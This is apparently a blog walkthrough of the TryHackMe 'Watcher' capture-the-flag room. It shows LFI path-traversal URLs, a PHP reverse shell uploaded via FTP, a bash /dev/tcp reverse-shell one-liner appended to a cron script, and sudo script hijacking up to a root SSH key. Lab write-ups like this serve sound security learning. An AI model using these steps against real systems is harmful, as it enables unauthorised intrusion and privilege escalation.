Watcher Tryhackme Writeup

By Shamsher khan This is a Writeup of Tryhackme room “Watcher”

https://tryhackme.com/room/watcher

Room link: https://tryhackme.com/room/watcher
Note: This room is free

Introduction

Watcher was an eloquently constructed beginner level box designed to help introduce some key concepts and methods that are often seen across various penetration testing platforms. Despite not having any particularly difficult parts, it required some out of the box thinking as well as the ability to effectively analyse and chain together exploitation techniques. It’s a relatively long box, but provides a thoroughly enjoyable learning experience.

Initial Enumeration

Initial nmap scan shows the following ports:
21 vsftpd (up to date)
22 SSH 7.6p1 (up to date)
80 HTTP with Jekyll 4.1.1

Web Server

Running a gobuster on the web server:

gobuster dir -u 10.10.211.47 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt

Traversing to the website and checking the /robots.txt page shows some interesting pages.

/flag_1.txt contains the first flag. The second directory at /secret_file_do_not_read.txt can’t be accessed. Something to remember for later perhaps.

Going back to the initial webpage, there is little functionality aside from links from clicking the photo of each placemat.

The description page for each placemat has a GET parameter in the URL which displays the post that you’re looking at:

http://10.10.211.47/post.php?post=striped.php

The input for the GET parameter isn’t sanitized, so we can perform a local file inclusion attack. Going to http://10.10.211.47/post.php?post=../../../etc/passwd shows the users on the box.

Now we have a way to read files from the server. Thinking back to our initial exploration of the robots.txt file, there was a file we didn’t have access to, maybe we can get to it via the file inclusion vulnerability? We can assume the web “root” is /var/www/html as that’s the default location.

http://10.10.211.47/post.php?post=../../../var/www/html/secret_file_do_not_read.txt

We get credentials.

FTP

Now we have credentials, it is time to explore FTP! Connect and authenticate by using ftp 10.10.211.47. When logged in, running a dir command to list the contents of the directory shows the second flag is there, and a folder called files

The files directory is empty, but we can see from the permissions that it is writeable. In the original message that we got the credentials from, it says I’ve set the files to be saved to /home/ftpuser/ftp/files . Since we can write to this directory, we can upload things to the server.

Grab a php shell from pentest monkey’s github and edit it to contain your IP and the port you plan to host a netcat listener on.

Shell.php

Then go back into the ftp server and into the files folder and use the put command to upload the shell.

Since we know the path of the uploads, it is now possible to traverse to the php file and it will execute the code inside. However, we need a netcat listener sat waiting to catch the connection.

Then traverse to 10.10.211.47/post.php?post=../../../home/ftpuser/ftp/files/shell.php (Changing the name of the file to whatever you uploaded it as) and the listener should catch a reverse shell.

Here we got reverse shell

Get TTy shell

script -qc /bin/bash /dev/null

Personally, I always like to check out the web folder when I get into a box to see if there was any files or database credentials lying about. Going to /var/www/html and typing ls shows the contents of the directory. All files and directories there are the ones we saw before, aside from more_secrets_a9f10a

In here there is the third flag!

Lateral Movement

The next thing I do is check the less-used directories, such as /opt and /media, incase there’s anything lying about. In /opt/ there is a backups directory that is owned by root and accessible by the adm group, so there is a potential avenue if we get a user that is part of that group.

Going to the /home/ directories next, both toby and mat have note.txt that are readable

Since toby has flag 4, I'll assume that's the first user to get. The note talks about mat setting up cron jobs.

If we run sudo -l to check our sudo permissions, we can see that we can run ALL commands without a password as the user toby.

Going back to the information we found earlier about the cron jobs, I’m thinking we need to edit a running cronjob that executes as mat to get user as him instead. Checking the jobs folder, there is a cow.sh file that we own that constantly copies BEEFY pictures to the /tmp directory. It is owned by our current user, and so we can edit it. Examining the /etc/crontab shows that the script runs every minute as the user mat, so even though toby owns it, it executes in the context of the user running the cron.

Add a reverse shell into the file the cronjob executes, obviously changing the IP and port

But before start netcat reverse shell

nc -lvp 4444

echo 'bash -c "bash -i >& /dev/tcp/10.2.12.26/4444 0>&1"' >> cow.sh

Then after a minute or so, mat will execute the now malicious bash script and send us a reverse shell as his user.

We can now get flag 5.

In the note on mats home directory, we can see that will is explaining how he can run python3 scripts as his user using sudo. Running sudo -l confirms this

In the scripts directory, there is two files. cmd.py and will_script.py

At the end of will_script we can see it runs a system command that takes the parameter of cmd, which is set to whatever is the first argument after we run the script. The cmd script is owned by mat, and shows that if we put in a 1, it will perform ls -lah. If we put in a 2 it will perform id and a 3 it will cat /etc/passwd. will_script only allows those three commands it seems.

Since it’s hard to use text editors in a netcat shell due to env variables being off (I believe),

Since the files are in mats home directory, we add our revershell in cmd.py because can’t edit will_script.py but we can edit cmd.py

now start netcat listener

nc -lvp 3333

we can run will_script.py with the privileged of will user. but we can’t edit will_script.py so that’s why i can edit cmd.py and use AND operator to excute cmd.py with privileged of will user

and here we got shell

We got flag 6

Using id we can see that we are part of the adm group.. Remember that backups folder we found earlier that was owned by the adm group? Let's go check it out.

Echoing the key and piping to a base64 -d reveals a private key.

Save this to a file and remember to chmod 600 it.

Could it be that this is the root SSH key?!

And finally we got root flag

You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher

For more walkthroughs stay tuned…
Before you go…

Visit my other walkthrough’s:-

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!

Web Application Pen-tester || CTF Player || Security Analyst || Freelance Cyber Security Trainer